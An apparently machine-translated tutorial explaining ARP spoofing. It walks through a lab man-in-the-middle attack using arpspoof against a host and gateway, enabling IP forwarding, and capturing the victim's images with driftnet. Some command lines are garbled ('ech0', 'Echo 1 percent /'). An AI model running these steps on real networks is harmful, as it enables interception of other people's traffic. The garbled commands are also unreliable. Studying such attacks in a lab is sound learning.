Shulou(Shulou.com)06/01 Report--

Address resolution protocol

ARP (Addre***esolution Protocol) is a TCP/IP protocol that obtains physical addresses based on IP addresses. When sending information, the host broadcasts the ARP request containing the destination IP address to all hosts on the network and receives a return message to determine the physical address of the destination

ARP deception

* users can send pseudo ARP reply messages to a host, so that the information it sends cannot reach the expected host or the wrong host, which constitutes an ARP spoofing.

1. Fake ARP reply packet (unicast)

XXX,Ihave IP YYY and my MAC is ZZZ!

2. Fake ARPreply packet (broadcast)

Helloeveryone! I have IP YYY and my MAC is ZZZ!

Spread fake IP/MAC to everyone

3. Fake ARPrequest (broadcast)

I have IP XXX and my MAC is YYY.

Who hasIP ZZZ? Tell me please!

MAC that looks for IP ZZZ is actually broadcasting fake IP and MAC mappings (XXX,YYY).

4. Fake ARPrequest (unicast)

Known MAC of IP ZZZ

Hello IPZZZ! I have IP XXX and my MAC is YYY.

5. Impersonate a middleman

Enabling packet forwarding on spoofed hosts (MAC is MMM)

Send a fake ARPReply to the host AAA:

AAA,Ihave IP BBB and my MAC is MMM

Send a fake ARPReply to the host BBB:

BBB,Ihave IP AAA and my MAC is MMM

Because of the aging mechanism of ARP Cache, it is sometimes necessary to do periodic continuous deception.

The verification of arp spoofing is completed by running on the virtual machine.

Open the virtual machine and assign an IP address to the virtual machine so that the virtual machine can connect to the Internet.

Commands on the virtual machine command interface

1. Ifconfig (check whether it is matched with ip)

2. Ping172.28.15.55

3. Arpspoof-i ech0-t 172.28.15.55 172.28.15.254

/ * echo 1 > / proc/sys/net/ipv4/ip_forward

Echo 1 percent /

4. Cd / proc/sys/net/ipv4 (in the file)

Cat ip

Cat ip_forward

5. Arpspoof-i eth0-t 172.28.15.254 172.28.15.55

6. Driftnet (shows the captured image)

7. History (View History command)

Steps 1 and 2 prove that it can be connected to 172.28.15.55, and this computer can also access the Internet at this time.

The third step is 172.28.15.55 this computer sends ARP to ask what the MAC address of this gateway is. My computer keeps sending messages to 172.28.15.55, deceiving it that the MAC of 172.28.15.254 is the MAC address of my computer. At this time, all the icmp packets sent by 172.28.15.55 from this computer are sent to my computer, so it can not be connected to the Internet.

This is the easiest way to verify ARP spoofing.

The fourth step is to store the data sent on the Internet in my file.

Every 5 steps is to deceive the gateway to send the data from the external network to 172.28.15.55 to my target file, and then forward it to 172.28.15.55 through my computer.

Step 6 is to intercept the image from the data stream sent to the computer 172.28.15.55 on the extranet.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.